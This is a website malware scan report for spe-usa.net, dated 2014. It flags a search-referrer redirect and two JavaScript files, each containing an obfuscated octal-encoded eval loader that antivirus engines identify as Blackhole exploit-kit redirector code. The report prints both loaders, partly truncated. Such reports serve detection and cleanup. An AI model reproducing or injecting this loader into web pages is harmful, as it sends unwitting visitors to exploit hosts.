New scan:

Malware Scanner report for spe-usa.net

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://theoldsiammusic.com/cnt.php
17 websites infected.

The website "spe-usa.net" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://spe-usa.net/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: spe-usa.net
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 17 Sep 2014 09:29:29 GMT
Location: http://theoldsiammusic.com/cnt.php
Server: Apache
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://spe-usa.net/
200 OK
Content-Length: 6085
Content-Type: text/html
clean
http://spe-usa.net/js/stuHover.js
200 OK
Content-Length: 6453
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,147,173,171,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,147,173,171,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,154,151,163,160,150,167,155,145,161,161,171,167,155,147,62,147,163,161,63,147,162,170,62,164,154,164,53,77,21,16,44,147,173,171,156,
... 3003 bytes are skipped ...
67,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz^=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));

Antivirus reports:

AntiVir
JS/EXP.Redir.EL.7
Ikarus
Virus.JS.Obfuscated
CAT-QuickHeal
JS/Coolex.D
McAfee-GW-Edition
JS/Exploit-Blacole.ht
McAfee
JS/Exploit-Blacole.ht

http://spe-usa.net/index.shtml
200 OK
Content-Length: 6085
Content-Type: text/html
clean
http://spe-usa.net/about.shtml
200 OK
Content-Length: 8101
Content-Type: text/html
clean
http://spe-usa.net/about_news.shtml
200 OK
Content-Length: 11667
Content-Type: text/html
clean
http://spe-usa.net/about_testimonials.shtml
200 OK
Content-Length: 7807
Content-Type: text/html
clean
http://spe-usa.net/about_group.shtml
200 OK
Content-Length: 8869
Content-Type: text/html
clean
http://spe-usa.net/products_rigs.shtml
200 OK
Content-Length: 15133
Content-Type: text/html
clean
http://spe-usa.net/products_hammers.shtml
200 OK
Content-Length: 12923
Content-Type: text/html
clean
http://spe-usa.net/products_accessories.shtml
200 OK
Content-Length: 7463
Content-Type: text/html
clean
http://spe-usa.net/products_inventory.shtml
200 OK
Content-Length: 13675
Content-Type: text/html
clean
http://spe-usa.net/parts.shtml
200 OK
Content-Length: 6832
Content-Type: text/html
clean
http://spe-usa.net/gallery.shtml
200 OK
Content-Length: 41138
Content-Type: text/html
clean
http://spe-usa.net/gallery/prototype.js
200 OK
Content-Length: 130974
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,147,173,171,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,147,173,171,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,154,151,163,160,150,167,155,145,161,161,171,167,155,147,62,147,163,161,63,147,162,170,62,164,154,164,53,77,21,16,44,147,173,171,156,
... 3003 bytes are skipped ...
67,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz^=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));

Antivirus reports:

AntiVir
JS/EXP.Redir.EL.7
Ikarus
Virus.JS.Obfuscated
CAT-QuickHeal
JS/Coolex.D
McAfee-GW-Edition
JS/Exploit-Blacole.ht
McAfee
JS/Exploit-Blacole.ht

http://spe-usa.net/products.shtml
200 OK
Content-Length: 6583
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=spe-usa.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://spe-usa.net/

Result: spe-usa.net is not infected or malware details are not published yet.